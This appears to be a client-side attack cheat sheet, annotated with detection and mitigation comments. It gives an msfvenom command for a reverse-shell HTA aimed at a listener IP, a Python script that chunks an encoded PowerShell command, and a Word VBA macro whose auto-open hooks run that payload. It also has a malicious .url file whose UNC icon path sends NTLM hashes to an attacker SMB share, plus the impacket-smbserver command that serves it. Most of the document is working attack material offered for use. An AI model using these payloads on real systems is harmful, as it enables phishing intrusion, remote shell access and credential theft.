
ClienSide

Client Side Attacks GPLv3 license

Word Macro

Make evil VBS
# Builds a Windows reverse-TCP shell payload (-p) in the hta-psh format (-f),
# i.e. an HTA wrapper around an encoded PowerShell command line, and writes it
# to evil.hta (-o). LHOST/LPORT are the lab listener address and port.
# Detection: the generated command line carries "-nop -w hidden -e", a
# combination worth alerting on in process-creation telemetry.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.205 LPORT=443 -f hta-psh -o evil.hta
split.py
# Cuts the command line into fixed-width pieces and prints each piece as a VBA
# string-concatenation statement.
# Reviewer note: the output is a long run of short `Str = Str + "..."` lines;
# that shape, together with the Base64 alphabet in the literals, is a useful
# static indicator when triaging macro source.
command = "powershell.exe -nop -w hidden -e aQBmACgAWwB..ADsA"
width = 50

offset = 0
while offset < len(command):
    piece = command[offset:offset + width]
    print('Str = Str + "' + piece + '"')
    offset += width
macro VBA
' Word auto-run hook: called when the document is opened with macros enabled.
' It does nothing except hand off to EvilMacro.
Sub AutoOpen()
    EvilMacro
End Sub

' Document-level open event; wired to the same routine as AutoOpen, so either
' hook leads to the same code path.
Sub Document_Open()
    EvilMacro
End Sub

' Assembles a command line from short string literals and starts it through
' WScript.Shell.
' Detection and mitigation notes for reviewers:
'   - Auto-run hooks plus CreateObject("Wscript.Shell").Run are flagged by
'     static macro analysers such as olevba.
'   - At run time this typically shows up as the Office process spawning
'     powershell.exe; the "Block all Office applications from creating child
'     processes" attack surface reduction rule targets that behaviour.
'   - Blocking macros in documents that carry Mark-of-the-Web stops the hooks
'     above from firing in the first place.
Sub EvilMacro()
    Dim Str As String

    ' "-nop -w hidden -e": no profile, hidden window, Base64 (UTF-16LE) encoded
    ' command. The visible head and tail of the literal decode to a
    ' FromBase64String -> gzip Decompress -> StreamReader -> iex chain, so the
    ' real script body is unpacked in memory; PowerShell script block logging
    ' records the decoded form.
    Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
    Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
    Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A"
    Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg"
    Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY"
    Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"
    ' (the page elides the middle of the literal here)
    ...
    Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"
    Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB"
    Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA"
    Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
    Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
    Str = Str + "QA="

    ' Run is called with the command string only (no window-style or wait
    ' arguments).
    CreateObject("Wscript.Shell").Run Str
End Sub

Save macro as Word 97-2003 Document

Check macro with olevba

[root@kali xpl]# olevba evil.doc
olevba 0.60 on Python 3.10.4 - http://decalage.info/python/oletools
===============================================================================
FILE: evil.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: evil.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
...SNIP..

ShortCut

@evil.url
; Internet shortcut whose only meaningful field is IconFile; URL and
; WorkingDirectory hold filler values.
[InternetShortcut]
URL=anything
WorkingDirectory=anything
; IconFile is a UNC path on a remote host. The shell is expected to fetch the
; icon when it renders the shortcut, which makes the client open an SMB
; session to that host, and %USERNAME% in the file name is expanded on the
; client side.
; Mitigation: block outbound SMB (TCP 445/139) at the perimeter and restrict
; outgoing NTLM to remote servers; hunt for .url/.lnk files whose icon path is
; a UNC path outside the organisation.
IconFile=\\192.168.49.241\SERVER\%USERNAME%.icon
IconIndex=1
smbserver
# Serves the current directory as an SMB share named SERVER with SMB2 support;
# the share name matches the \\host\SERVER\ path in evil.url's IconFile.
# Detection: workstations opening SMB sessions to hosts that are not known
# file servers, especially outside the internal address plan.
impacket-smbserver -smb2support SERVER $(pwd)